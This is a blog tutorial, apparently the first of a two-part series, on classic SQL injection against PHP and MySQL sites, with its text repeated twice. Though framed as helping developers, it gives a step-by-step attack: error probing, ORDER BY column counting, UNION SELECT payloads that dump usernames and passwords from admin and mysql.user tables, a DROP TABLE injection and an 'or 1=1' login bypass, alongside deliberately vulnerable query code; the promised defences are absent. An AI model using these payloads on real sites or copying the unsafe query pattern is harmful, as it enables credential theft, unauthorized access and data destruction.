mohamed BADR | Articles | SQL injection how to ?

SQL injection how to ?
SQL injection how to ? In this tutorial I will describe how SQL injection works and how to know if your site is in danger for a hacking attacks using the SQL injection, the article is divided into 2 parts the first part will be teaching you how the hacker work, not how to be a hacker J The second article will be implementing methods of preventing hacker attacks using the SQL injection. First of all: What is SQL injection? It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in URL and gain access to some confidential information, in short, it gives a hacker the ability to ask any question of the database and therefore control the database and the data within. SQL injection attack is executed when a web page allows users to enter text into a textbox or in the URL that will be used to run a query against the database. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises. It can be relatively simple for an attacker to find out enough information about how a database works, to be able to log in as an admin member of an organization's website With SQL injections, cyber-criminals can take complete remote control of the database, with the consequence that they can become able to manipulate the database to do anything they wish, including: Insert a command to get access to all account details in a system, including user names and passwords Shut down a database Upload files Through reverse lookup, gather IP addresses and attack those computers with an injection attack Corrupting, deleting or changing files and interact with the OS, reading and writing files Online shoplifting e.g. changing the price of a product or service, so that the cost is negligible or free Insert a bogus name and credit card in to a system to scam it at a later date Delete the database and all its contents There are 2 types of SQL injection : 1.SQL Injection (call it classic) . 2.Blind SQL Injection (the harder part) So let's start with some action, the article here will be concerning about the classic injection, the 2nd part of the article will be about preventing it.. so first we need to know how the hacker works so we know how to deal with him and do our code with knowledge of what can happen if we take things lightly… 1). Check for vulnerability Let's say that we have a dynamic news web page that gets the news by id http://www.website.com/news.php?id=1 Now to test if it is vulnerable we add (quote) to the end of URL ' , and that would be http://www.website.com/news.php?id=1' so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySql server version for the right etc..." or something similar that means is vulnerable to SQL injection :) now I expect the code behind this news page is $sqlProducts="select * from news where news_id=$id"; $rsProducts=mysql_query($sqlProducts) or die(mysql_error()); 2). Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. http://www.website.com/news.php?id=5 order by 1/* <-- no error http://www.website.com/news.php?id=5 order by 2/* <-- no error http://www.website.com/news.php?id=5 order by 3/* <-- no error http://www.website.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that) that means that the it has 3 columns, cause we got an error on 4. 3). Check for UNION function With union we can select more data in one SQL statement, UNION SELECT Queries must return the same number of arguments as the table which was being used. Often times, in the case of SELECT * queries, this number is unknown. That's why I was interested to know how many columns the table is so I can use the union clause.. so we have http://www.website.com/news.php?id=5+union+all+select+1,2,3 (we already found that number of columns are 3 in section 2). if we see some numbers on screen, i.e. 1 or 2 or 3 then the UNION works :) and thus a hacker found a great and easy security hole in you website, I can tell you now you are in a great danger so now the hacker can use the union to do whatever he wants with your database by injecting his queries to your query and get his wanted results, easy! For example, the hacker can do this http://www.website.com/news.php?id=5+union+all+select+1,username,password+from+users he now has a full list of usernames and passwords of your users, I bet he can do a lot, the possibilities are unlimited. 4). Getting table and column name well if the MySql version is < 5 (i.e. 4.1.33, 4.1.12...) we must guess table and column name in most cases. common table names are: user/s, admin/s, member/s, login/s ... common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc... i.e. would be http://www.site.com/news.php?id=5+union+all+select+1,2,3+from admin (we see number 2 on the screen like before, and that's good :D) we know that table admin exists... now to check column names. http://www.site.com/news.php?id=5+union+all+select+1,username,3+from+admin (if you get an error, then try the other column name) we get username displayed on screen, example would be admin, or superadmin or whatever etc... now to check if the password column exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name) we seen password on the screen in hash or plain-text, it depends of how the database is set up :) i.e. md5 hash, MySql hash, sha1... now we must complete query to look nice :) for that we can use concat() function (it joins strings) i.e. http://www.site.com/news.php?id=5+union+all+select 1,concat(username,0x3a,password),3 from admin Note that I put 0x3a, its hex value for : (so 0x3a is hex value for colon) (there is another way for that, char(58), ASCII value for : ) http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* now we get dislayed username:password on screen, i.e admin:admin or admin:somehash when you have this, you can login like admin or some superuser :D if can't guess the right table name, you can always try mysql.user (default) it has user I password columns, so example would be http://www.site.com/news.php?id=5+union+all+select 1,concat(user,0x3a,password),3 from mysql.user 4). Dropping tables Now its turn of intruder to inject SQL command in the URL of the page, the code might be like this 1′; DROP TABLE product; # and the URL looks like this http://www.website.com/news.php?id=1′; DROP TABLE product; # Now query becomes like this SELECT * FROM news WHERE id=’10′; DROP TABLE product; #’; The hash “#”, it tell MYSQL server to ignore the rest of the query. In this query, it simply ignore the last single quote (’) of the query. those were just a few examples on SQL injection using URL to inject a malicious query into your code, you might think, well ok I will not use this kind of URL news.php?id=1 well if you managed to do that, I want to tell there is another way the hacker will look for when thinking about your site, which is the HTML forms J yes HTML forms are great security hole too Everything between the <FORM> and </FORM> have potential parameters that might be useful (hacker wise). For example a login form <FORM action=login.php method=post> <input name="username" type="text" id="username" size="15"> <input name="password" type="text" id="password" size="15"> <input type=hidden name=A value=C> </FORM> He will just download the source HTML from the site, save it in on his computer, modify the post URL and hidden field accordingly. Example: <FORM action=http://www.yoursite.com/login.php method=post> <input name="username" type="text" id="username" size="15" value "hi' or 1=1"> <input name="password" type="text" id="password" size="15"> <input type=hidden name=A value="hi' or 1=1--"> </FORM> If luck is on your side, you will get login without any login name or password. Because now the query will look like this Select * from users where username='' or 1 =1 and password = password And since 1=1 is always true, he can login with no username or password I bet you are getting amazed by now of the possibilities that a hacker can do with your website, and I want to tell you that this is not only for websites developed with PHP and MySql database all other databases and web development languages are also vulnerable to SQL injection attacks, however my spatiality is PHP so that's what I can talk about

SQL injection how to ?

SQL injection how to ?
In this tutorial I will describe how SQL injection works and how to know if your site is in danger for a hacking attacks using the SQL injection, the article is divided into 2 parts the first part will be teaching you how the hacker work, not how to be a hacker J
The second article will be implementing methods of preventing hacker attacks using the SQL injection.

First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in URL and gain access to some confidential information, in short, it gives a hacker the ability to ask any question of the database and therefore control the database and the data within.

SQL injection attack is executed when a web page allows users to enter text into a textbox or in the URL that will be used to run a query against the database. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises. It can be relatively simple for an attacker to find out enough information about how a database works, to be able to log in as an admin member of an organization's website

With SQL injections, cyber-criminals can take complete remote control of the database, with the consequence that they can become able to manipulate the database to do anything they wish, including:

Insert a command to get access to all account details in a system, including user names and passwords
Shut down a database
Upload files
Through reverse lookup, gather IP addresses and attack those computers with an injection attack
Corrupting, deleting or changing files and interact with the OS, reading and writing files
Online shoplifting e.g. changing the price of a product or service, so that the cost is negligible or free
Insert a bogus name and credit card in to a system to scam it at a later date
Delete the database and all its contents

There are 2 types of SQL injection :

1.SQL Injection (call it classic) .

2.Blind SQL Injection (the harder part)

So let's start with some action, the article here will be concerning about the classic injection, the 2nd part of the article will be about preventing it..

so first we need to know how the hacker works so we know how to deal with him and do our code with knowledge of what can happen if we take things lightly…

1). Check for vulnerability

Let's say that we have a dynamic news web page that gets the news by id

http://www.website.com/news.php?id=1

Now to test if it is vulnerable we add (quote) to the end of URL ' ,

and that would be http://www.website.com/news.php?id=1'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySql server version for the right etc..."
or something similar

that means is vulnerable to SQL injection :)

now I expect the code behind this news page is

$sqlProducts="select * from news where news_id=$id";
$rsProducts=mysql_query($sqlProducts) or die(mysql_error());

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.website.com/news.php?id=5 order by 1/* <-- no error

http://www.website.com/news.php?id=5 order by 2/* <-- no error

http://www.website.com/news.php?id=5 order by 3/* <-- no error

http://www.website.com/news.php?id=5 order by 4/* <-- error
(we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one SQL statement, UNION SELECT Queries must return the same number of arguments as the table which was being used. Often times, in the case of SELECT * queries, this number is unknown.

That's why I was interested to know how many columns the table is so I can use the union clause..

so we have

http://www.website.com/news.php?id=5+union+all+select+1,2,3
(we already found that number of columns are 3 in section 2).

if we see some numbers on screen, i.e. 1 or 2 or 3 then the UNION works :)
and thus a hacker found a great and easy security hole in you website, I can tell you now you are in a great danger

so now the hacker can use the union to do whatever he wants with your database by injecting his queries to your query and get his wanted results, easy!

For example, the hacker can do this
http://www.website.com/news.php?id=5+union+all+select+1,username,password+from+users

he now has a full list of usernames and passwords of your users, I bet he can do a lot, the possibilities are unlimited.

4). Getting table and column name

well if the MySql version is < 5 (i.e. 4.1.33, 4.1.12...)
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s, login/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e. would be

http://www.site.com/news.php?id=5+union+all+select+1,2,3+from admin

(we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5+union+all+select+1,username,3+from+admin

(if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin or whatever etc...

now to check if the password column exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e. md5 hash, MySql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e.

http://www.site.com/news.php?id=5+union+all+select 1,concat(username,0x3a,password),3 from admin

Note that I put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ASCII value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user I password columns, so example would be

http://www.site.com/news.php?id=5+union+all+select 1,concat(user,0x3a,password),3 from mysql.user

4). Dropping tables

Now its turn of intruder to inject SQL command in the URL of the page, the code might be like this
1′; DROP TABLE product; #

and the URL looks like this

http://www.website.com/news.php?id=1′; DROP TABLE product; #

Now query becomes like this

SELECT * FROM news WHERE id=’10′; DROP TABLE product; #’;

The hash “#”, it tell MYSQL server to ignore the rest of the query. In this query, it simply ignore the last single quote (’) of the query.

those were just a few examples on SQL injection using URL to inject a malicious query into your code, you might think, well ok I will not use this kind of URL news.php?id=1 well if you managed to do that, I want to tell there is another way the hacker will look for when thinking about your site, which is the HTML forms J
yes HTML forms are great security hole too

Everything between the <FORM> and </FORM> have potential parameters that might be useful (hacker wise).

For example a login form

He will just download the source HTML from the site, save it in on his computer, modify the post URL and hidden field accordingly. Example:

If luck is on your side, you will get login without any login name or password. Because now the query will look like this

Select * from users where username='' or 1 =1 and password = password

And since 1=1 is always true, he can login with no username or password

I bet you are getting amazed by now of the possibilities that a hacker can do with your website, and I want to tell you that this is not only for websites developed with PHP and MySql database all other databases and web development languages are also vulnerable to SQL injection attacks, however my spatiality is PHP so that's what I can talk about

Conclusion:
From now on start another way of testing other than application testing, you have to give some time for security testing, try to follow the steps to know if your site is vulnerable and wait for the next article I will be telling you about how to protect your site from those attacks